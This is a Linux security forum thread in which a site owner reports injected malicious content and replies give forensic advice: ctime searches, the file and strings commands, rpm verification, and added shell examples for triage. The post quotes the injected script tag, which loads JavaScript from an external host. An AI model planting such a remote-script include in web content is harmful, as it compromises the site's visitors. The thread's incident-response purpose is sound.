Linux - Security
This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
This time I want to ask you for special support; since yesterday I have had problems with the content of our system.
Investigating the situation, we've found that someone has included malicious code in our content containing this script <script src="http://csjq.hol.es/xs.js"/script>; this one was built with a tool called makeself.
Reading about this tool, we found that makeself is a small shell script that generates a self-extractable compressed TAR archive from a directory. The resulting file appears as a shell script, and can be launched as is. The archive will then uncompress itself to a temporary directory and an arbitrary command will be executed (for example, an installation script).
So, can anybody help me identify the scripts or files that this tool generated?
You could look for files with a ctime later than about the time of the hostile activity.
You could extract a tarfile once you have found it.
On a disposable system, a trick for capturing self-extracting content is to have an append-only filesystem that you extract onto, so the code will fail to delete its traces. You could rig this using NFS or a kernel with unlink() not implemented. Directory attributes also work, provided the extraction uses the directory in question.
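The ctime search suggested above, as an added example that is not code from the thread: a shell function that lists regular files whose inode changed after a reference file, plus a constructed demo directory (the .reference marker, known_good.sh and the xs.js stand-in are assumptions made for the demo, not files from the poster's system).

```shell
#!/bin/sh
# Added example, not from the thread: find files changed after a reference time.
# ctime is the inode change time. Writes, chmod, chown, rename and link all bump
# it, and unlike mtime it cannot be backdated with touch -t (that call itself
# sets ctime to "now"), so an intruder who resets mtime still leaves ctime
# pointing at the time of the tampering.
# -cnewer is GNU/BSD find, not POSIX; GNU find also accepts -newerct "2 days ago".

# recently_changed ROOT REF: print regular files under ROOT whose ctime is
# newer than REF's ctime. REF can be any file you know predates the incident,
# e.g. a log file rotated the day before. -xdev keeps find on one filesystem.
recently_changed() {
    find "$1" -xdev -type f -cnewer "$2" -print
}

# Constructed demo: a clean file, then a reference marker, then a file
# planted "after the incident". Prints the basenames that get flagged.
demo() {
    tmp=$(mktemp -d) || return 1
    echo 'echo clean' > "$tmp/known_good.sh"
    : > "$tmp/.reference"   # marks the last known-good instant
    sleep 1                 # strictly later ctime even on 1-second filesystems
    echo '/* constructed sample */' > "$tmp/xs.js"   # stands in for the planted script
    recently_changed "$tmp" "$tmp/.reference" | sed 's|.*/||'
    rm -rf "$tmp"
}
```

On a real box, run recently_changed against / (or each mounted filesystem, because of -xdev) with a reference file from before the intrusion, and review the list before trusting any of those files; a mass of hits in /var/log or /var/cache is normal, hits in /bin, /usr/bin or a web root are not.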
Use "file" to find out what kind of file it is. If it is ASCII text or a script, you should be able to view it.
You can use "strings" to view any printable character sequences it can find, even in a binary.
Also, you can find out if any system files have been compromised (usually in /bin or /usr/bin) by running rpm -qV (V = verify). It will tell you which files have changed since the original package installation. To view everything:
rpm -qaV
This will take a while.
And of course you'll need someone Linux-proficient to go through the output and know which files are supposed to have changed since installation (e.g. /etc/passwd).
And you'll then also have to look in those files and see whether the changes are expected or not (who knows the proper users in /etc/passwd?).
But if it shows you, for example, that /bin/ls has changed since install, that is fishy.
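Triage of rpm verify output along the lines of the post above, as an added example that is not code from the thread: the sample output is constructed (no real rpm run), and the list of directories treated as "binary" and the choice to skip config and doc files are assumptions a reviewer would tune per system.

```shell
#!/bin/sh
# Added example, not from the thread: triage rpm verify output.
# rpm -V prints one line per file that fails a check: nine flag columns
# (S size, M mode, 5 digest, D device, L link, U user, G group, T mtime,
# P capabilities), then a file-type attribute (c config, d doc, g ghost, ...)
# or blank, then the path. A '.' means that test passed; the word "missing"
# replaces the flags when the file is gone.

# Constructed sample output standing in for: rpm -Va 2>/dev/null
SAMPLE_RPM_VA='S.5....T.    /bin/ls
S.5....T.  c /etc/passwd
.......T.    /usr/bin/ssh
missing     /usr/sbin/sshd
S.5....T.  d /usr/share/doc/bash/README
..5....T.    /usr/lib/libc.so.6'

# Print paths whose contents changed (size or digest) or that are missing,
# restricted to directories where a modified file is rarely legitimate.
# Config (c) and documentation (d) files are skipped; mtime-only changes are
# ignored because upgrades and prelink touch them routinely.
suspicious_changes() {
    awk '
    {
        flags = $1
        path  = $NF
        attr  = (NF == 3) ? $2 : ""
        if (attr == "c" || attr == "d") next
        if (path !~ /^\/(bin|sbin|lib|lib64|usr\/bin|usr\/sbin|usr\/lib|usr\/lib64)\//) next
        if (flags == "missing" || flags ~ /S/ || flags ~ /5/) print path
    }'
}

# Usage on a live system: rpm -Va 2>/dev/null | suspicious_changes
# Runs the filter over the constructed sample instead.
sample_suspicious() {
    printf '%s\n' "$SAMPLE_RPM_VA" | suspicious_changes
}
```

Note that rpm's own database can be edited by an intruder with root, so a clean verify proves little; a hit like /bin/ls or libc.so.6 changing is the useful signal, and the comparison is only trustworthy when run from rescue media or against a known-good rpm database.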
If someone was capable of modifying your delivered web-page at all, then some part of your system has been compromised. (Or else you have a rogue employee ...)
So much time wasted on what it is or what's in it... who cares? All I'd need to know is that I, or my system, did not put it there, and that makes it immediately suspect.